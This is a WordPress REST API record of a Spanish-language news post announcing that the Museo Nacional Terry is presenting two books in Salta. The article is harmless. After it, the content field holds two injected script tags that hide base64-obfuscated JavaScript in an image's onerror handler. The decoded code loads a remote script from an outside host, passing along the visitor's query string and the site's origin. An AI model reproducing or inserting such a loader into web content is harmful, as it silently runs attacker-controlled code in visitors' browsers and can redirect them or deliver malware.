{"id":4046,"date":"2024-05-22T09:42:57","date_gmt":"2024-05-22T12:42:57","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4046"},"modified":"2025-08-13T23:55:36","modified_gmt":"2025-08-14T02:55:36","slug":"los-libros-del-museo-nacional-terry-llegan-a-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4046","title":{"rendered":"Los libros del Museo Nacional Terry llegan a Salta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-d155fd77be9024b2c2bd21475acdd2f0\" style=\"background-color:#620331\"><em>Hoy 22 de mayo, el Museo Nacional Terry presenta en Salta sus dos \u00faltimos libros, que sistematizan su trabajo comunitario. La exposici\u00f3n sobre c\u00f3mo gestionar construyendo puentes culturales se dividir\u00e1 entre la Universidad Nacional de Salta y el Museo Hist\u00f3rico del Norte.<\/em><\/h4>\n\n\n\n<p>Hoy&nbsp;mi\u00e9rcoles 22 de mayo el Museo Nacional Terry presentar\u00e1 en Salta sus \u00faltimos dos libros, los cuales sistematizan el trabajo comunitario que la instituci\u00f3n viene llevando a cabo durante los \u00faltimos a\u00f1os. Se trata de tres producciones denominadas \u201cInfancias y crianzas en los museos\u201d y \u201cEl territorio no es un mapa\u201d, editados durante el 2023 por el Museo Nacional Terry de Tilcara, Jujuy.<\/p>\n\n\n\n<p>Dichas obras responden a los siguientes interrogantes: \u00bfc\u00f3mo es posible que los museos incorporen como perspectiva transversal los derechos humanos no solo en sus agendas sino como proyecto pol\u00edtico en general?, \u00bfc\u00f3mo trabajar en clave interdisciplinaria entre todos los integrantes que componen un espacio cultural?, \u00bfqu\u00e9 recomendaciones se deben tener en cuenta al momento de trabajar de forma articulada con diferentes grupos\/comunidades\/organizaciones\/instituciones p\u00fablicas?, \u00bfcu\u00e1l es el rol de un museo en su lugar de incidencia?, \u00bfc\u00f3mo generar un programa, pol\u00edticas y\/o actividades que recuperen las identidades, costumbres, historias locales en sinton\u00eda con nuevas narrativas tecnol\u00f3gicas?<\/p>\n\n\n\n<p>La presentaci\u00f3n se desarrollar\u00e1 en dos lugares. Durante mediod\u00eda, parte del personal del Museo Terry, junto a las autoras expondr\u00e1n las obras en la Universidad Nacional de Salta a las 12.30 hs. en el Anfiteatro G400, mientras desde las 18 hs se replicar\u00e1 la exposici\u00f3n en el Museo Hist\u00f3rico del Norte, tambi\u00e9n conocido como el Cabildo de Salta.<\/p>\n\n\n\n<p>El libro \u201cInfancias y crianzas en los museos\u201d es producto del reconocimiento internacional \u201c12\u00b0 Premio Ibermuseos Educaci\u00f3n\u201d que el Museo obtuvo en el 2022 por su trabajo con ni\u00f1os y ni\u00f1as en entornos rurales. El libro re\u00fane estas experiencias y las pone en di\u00e1logo con las de otro museo ganador del mismo premio y especialista en el trabajo con infancias: La Funda\u00e7\u00e3o Casa Grande &#8211; Memorial do Homem Kariri, de Nova Olinda, Brasil. Se trata de una coproducci\u00f3n biling\u00fce que cuenta con el patrocinio de Ibermuseos y que presenta una gran pluralidad de voces e im\u00e1genes para inspirar nuevos modelos de gesti\u00f3n cultural participativa. En el caso de este ejemplar, participaron de su redacci\u00f3n cuatro comunicadoras salte\u00f1as pertenecientes a la Universidad Nacional de Salta quienes se dedican a &nbsp;la docencia, investigaci\u00f3n y al trabajo en clave de comunicaci\u00f3n comunitaria: Ana Laura Elbirt, Florencia Tolava, Rita Casula y Mariana Ibarra.&nbsp;<\/p>\n\n\n\n<p>\u201cEl territorio no es un mapa. Artes contempor\u00e1neas argentinas desde las fronteras\u201d re\u00fane im\u00e1genes, testimonios y reflexiones sobre un ciclo de exposiciones curado por Florencia Califano entre 2020 y 2022: \u201cCardinales. Camino a la ternura\u201d que se desarroll\u00f3 en el Museo y como itinerancia en la Casa Nacional del Bicentenario, en la Ciudad Aut\u00f3noma de Buenos Aires, \u201cEnti Enti. Escenas del coraz\u00f3n habitado\u201d, \u201cLa crianza mutua. Cultivo, domesticaci\u00f3n y amparo textil\u201d y \u201cA pulso. Soberan\u00eda ollera y otras tribus materiales\u201d. El libro presenta los trabajos, modos de vivir y concebir el arte de m\u00e1s de 70 artistas y artesanas de la regi\u00f3n, tensionando criterios y categor\u00edas del sistema del arte.<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/los-libros-del-museo-nacional-terry-llegan-a-salta-95675\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hoy 22 de mayo, el Museo Nacional Terry presenta en Salta sus dos \u00faltimos libros, que sistematizan su trabajo comunitario. La exposici\u00f3n sobre c\u00f3mo gestionar construyendo puentes culturales se dividir\u00e1 entre la Universidad Nacional de Salta y el Museo Hist\u00f3rico del Norte. Hoy&nbsp;mi\u00e9rcoles 22 de mayo el Museo Nacional Terry presentar\u00e1 en Salta sus \u00faltimos [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4047,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-4046","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4046"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4046"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4046\/revisions"}],"predecessor-version":[{"id":6781,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4046\/revisions\/6781"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4047"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4046"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4046"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4046"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}